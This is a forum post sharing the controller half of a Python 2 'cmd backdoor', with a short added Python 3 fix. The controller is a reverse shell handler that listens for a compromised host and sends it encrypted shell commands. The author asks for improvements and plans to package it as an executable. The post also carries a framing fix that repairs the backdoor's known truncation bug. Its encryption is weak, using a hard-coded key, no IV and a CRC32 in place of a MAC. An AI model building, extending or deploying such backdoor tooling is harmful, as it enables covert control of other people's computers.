BGS

[PY] "Netcat, cmd backdoor" or remote cmd :-?


It was designed as a simple backdoor, but it still needs work. It is in a functional state, so I decided to show it to you as well, so you can give your opinion on what should be improved, added, etc. :)

Known bugs:

If you run dir, for example, in a folder with many files, the controller will give you the error: [WARNING] Checksum mismatch !!!

Solution?

I need to impose a limit on the flow of data sent through the socket from the server to the controller.

I don't know if it will be useful to you, but maybe it will help you understand how the client <-> server model works (it helped me a lot!), and it helped me not get too bored over the weekend :D

controller:

Python code - 102 lines - codepad

app (server):

Python code - 148 lines - codepad

Sample:

Controller:


# Python 2, using PyCrypto (Crypto.Cipher.AES)
import zlib
import struct
from Crypto.Cipher import AES
import argparse
import socket
import sys
import re


# Shared secret, hard-coded in both the controller and the app (server).
key = "s3cr3t0stuff0u0mad3bro?"


class CheckSumError(Exception):
    pass


def _lazysecret(secret, blocksize=32, padding='}'):
    """pads secret if not legal AES block size (16, 24, 32)"""
    if len(secret) not in (16, 24, 32):
        return secret + (blocksize - len(secret)) * padding
    return secret


def encrypt(plaintext, secret, lazy=True, checksum=True):
    """encrypt plaintext with secret
    plaintext - content to encrypt
    secret - secret to encrypt plaintext
    lazy - pad secret if less than legal blocksize (default: True)
    checksum - attach crc32 byte encoded (default: True)
    returns ciphertext
    """

    secret = _lazysecret(secret) if lazy else secret
    # No IV is passed, so every message is encrypted from the same cipher state.
    encobj = AES.new(secret, AES.MODE_CFB)

    if checksum:
        # CRC32 catches accidental corruption only; it is not a MAC.
        plaintext += struct.pack("i", zlib.crc32(plaintext))

    return encobj.encrypt(plaintext)


def decrypt(ciphertext, secret, lazy=True, checksum=True):
    """decrypt ciphertext with secret
    ciphertext - encrypted content to decrypt
    secret - secret to decrypt ciphertext
    lazy - pad secret if less than legal blocksize (default: True)
    checksum - verify crc32 byte encoded checksum (default: True)
    returns plaintext
    """

    secret = _lazysecret(secret) if lazy else secret
    encobj = AES.new(secret, AES.MODE_CFB)
    plaintext = encobj.decrypt(ciphertext)

    if checksum:
        # The last 4 bytes are expected to be the CRC32 of everything before them.
        crc, plaintext = (plaintext[-4:], plaintext[:-4])
        if not crc == struct.pack("i", zlib.crc32(plaintext)):
            raise CheckSumError("[WARNING] Checksum mismatch !!!")

    return plaintext


def main():
    desc = """Reverse shell handler: controller.exe -l ip port to listen for connections!"""
    parser = argparse.ArgumentParser(description=desc)
    parser.add_argument('ip', help='IP address for listening or connecting.')
    parser.add_argument('port', help='Port for listening or connecting.')
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-l', action='store_true',
                       help='Setup a listening server.')
    print '[INFO] Parsing arguments...'
    args = parser.parse_args()

    print '[INFO] Setting the socket...'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # Only listening mode is implemented; the command loop needs app_socket,
    # so it lives inside this branch.
    if args.l:
        print '[INFO] Binding on : %s:%s' % (args.ip, args.port)
        sock.bind((args.ip, int(args.port)))
        print '[INFO] Socket listening for connections...'
        sock.listen(5)
        print '[INFO] All set!'
        app_socket, app_ip = sock.accept()
        print '[INFO] Server attempting to connect! '

        while True:
            # A single recv(1024) returns at most 1024 bytes. A longer reply is
            # cut short, which is the case listed under "Known bugs".
            data = decrypt(app_socket.recv(1024), key)
            print data
            cmd = raw_input(">>>")

            if cmd == "exit":
                app_socket.send(encrypt("/close", key))
                sock.close()
                sys.exit(0)

            else:
                app_socket.send(encrypt(cmd, key))


if __name__ == '__main__':
    main()


Later edit: controller.exe appears in the description because I intend to make it an exe with py2exe xD.

Edited by BGS
  • Upvote 1
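
Added example (not part of BGS's post or code), in Python 3: the "Checksum mismatch" from Known bugs, reproduced without any cipher or shell. CFB decryption of a truncated ciphertext yields the truncated plaintext, so a single recv(1024) on a longer message leaves four ordinary data bytes where the CRC32 trailer should be; a length prefix with a size cap lets the receiver read the whole message. The helper names, the sample listing and the 1 MiB cap are assumptions.

```python
import socket
import struct
import zlib

CHUNK = 1024          # same read size as recv(1024) in the post
MAX_FRAME = 1 << 20   # assumed upper bound for one message (1 MiB)

def seal(payload):    # append a CRC32 trailer, as the post's encrypt() does
    return payload + struct.pack("<I", zlib.crc32(payload))

def unseal(blob):     # verify and strip the 4-byte CRC32 trailer
    payload, crc = blob[:-4], blob[-4:]
    if crc != struct.pack("<I", zlib.crc32(payload)):
        raise ValueError("checksum mismatch")
    return payload

def recv_exact(sock, n):  # one recv() may return fewer bytes than asked for
    buf = bytearray()
    while len(buf) < n:
        part = sock.recv(min(CHUNK, n - len(buf)))
        if not part:
            raise ConnectionError("peer closed mid-message")
        buf += part
    return bytes(buf)

def send_framed(sock, blob):
    sock.sendall(struct.pack("!I", len(blob)) + blob)  # 4-byte length prefix

def recv_framed(sock):
    (length,) = struct.unpack("!I", recv_exact(sock, 4))
    if length > MAX_FRAME:
        raise ValueError("frame exceeds MAX_FRAME")
    return recv_exact(sock, length)

def demo():
    # Constructed sample: a long directory listing, about 4.5 KB.
    listing = b"".join(b"file_%04d.txt\r\n" % i for i in range(300))
    a, b = socket.socketpair()
    with a, b:
        a.sendall(seal(listing))
        first = b.recv(CHUNK)              # what the post's loop does
        try:
            unseal(first)
            single_ok = True
        except ValueError:
            single_ok = False
        recv_exact(b, len(listing) + 4 - len(first))   # drain the remainder
        send_framed(a, seal(listing))
        return single_ok, unseal(recv_framed(b)) == listing  # (False, True)
```
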
